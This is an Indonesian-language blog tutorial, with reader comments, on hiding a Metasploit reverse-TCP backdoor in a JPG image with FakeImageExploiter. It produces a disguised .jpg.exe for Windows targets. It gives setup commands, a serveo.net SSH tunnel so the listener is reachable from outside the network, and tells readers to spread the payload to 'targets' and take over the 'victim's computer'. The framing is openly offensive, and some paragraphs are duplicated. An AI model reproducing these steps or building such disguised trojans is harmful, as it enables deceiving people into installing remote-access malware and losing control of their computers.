squadcyber - Hai guys, kali ini gw akan membawakan tutorial bagaimana cara nya menyisipkan backdoor metasploit untuk #windows ke dalam file image dengan menggunakan FakeImageExploiter, walaupun nanti output backdoor nya menjadi file.jpg.exe namun jika di #windows format exe nya menjadi tidak terlihat.
Fake Image Exploiter ini juga menggunakan metasploit untuk membuat dan listen backdoor nya, maka dari itu jika kalian tidak menggunakan distro #linux pentest yang tidak secara default terinstall metasploit, maka di wajib kan untuk menginstall nya terlebih dahulu.
Demikian tutorial Menyisipkan Backdoor Metasploit ke Dalam Gambar.
Fake Image Exploiter ini juga menggunakan metasploit untuk membuat dan listen backdoor nya, maka dari itu jika kalian tidak menggunakan distro #linux pentest yang tidak secara default terinstall metasploit, maka di wajib kan untuk menginstall nya terlebih dahulu.
Requirement
- mingw32
- Wine
- Xterm
- Zenity
- Wine Program Files
Cara Install dan Setting FakeImageExploiter
$ git clone https://github.com/r00t-3xp10it/FakeImageExploiter
$ cd FakeImageExploiter
$ chmod 777 FakeImageExploiter.sh settings
$ leafpad settings
Ubah isi settings sesuai gambar di bawah ini.
$ ./FakeImageExploiter.sh
maka akan muncul seperti di gambar di bawah ini,
dan muncul notifikasi Execute Framework maka klik OK.
lalu pilih payload yang akan kalian buat, kali ini gw memilih reverse tcp.
lalu pilih gambar yang akan disisipi backdoor, pilih gambar yang berformay jpg, atau jika kalian ingin mengganti nya kalian bisa rubah di settings tadi.
lalu pilih icon replacement.
dan beri nama pada payload tersebut.
maka payload akan terbuat, dan otomatis terbuka metasploit nya untuk listen payload tersebut.
buka terminal baru untuk menjalankan serveo agar bisa berjalan di target yang tidak dalam 1 jaringan saja.
$ ssh -R 3434:localhost:4444 serveo.net
3434 bisa kalian ganti sesuai dengan keinginan kalian.
lalu buka folder FakeImageExploier/output dan sebarkan payload yang telah kalian buat ke target kalian.
Update
Jika korban membuka file image yang telah kita sisipi backdoor tadi, maka metasploit nya akan berjalan dengan sendiri nya, dan kita akan tersambung dengan #komputer korban, di sini gw memakai #Virtual box sebagai contoh nya di karenakan tidak ada #pc ke 2 :v.
Baca Juga : Cara Install VirtualBox Kali Linux 2018
dan untuk mengetahui apa saja yang bisa kita lakukan cukup dengan mengetikkan "help" tanpa tanda petik.
Demikian tutorial Menyisipkan Backdoor Metasploit ke Dalam Gambar.
Semoga bermanfaat.

















Gan request tutorial cara FakeImage di termux
ReplyDeletebro, gimana sih ini mingw32 gaada di linux gw, pc gw 64bit
ReplyDeleteGan, mingw32 nya ga bisa di install ,, ada juga mingw64 .. ada solusi ngga gan??
ReplyDelete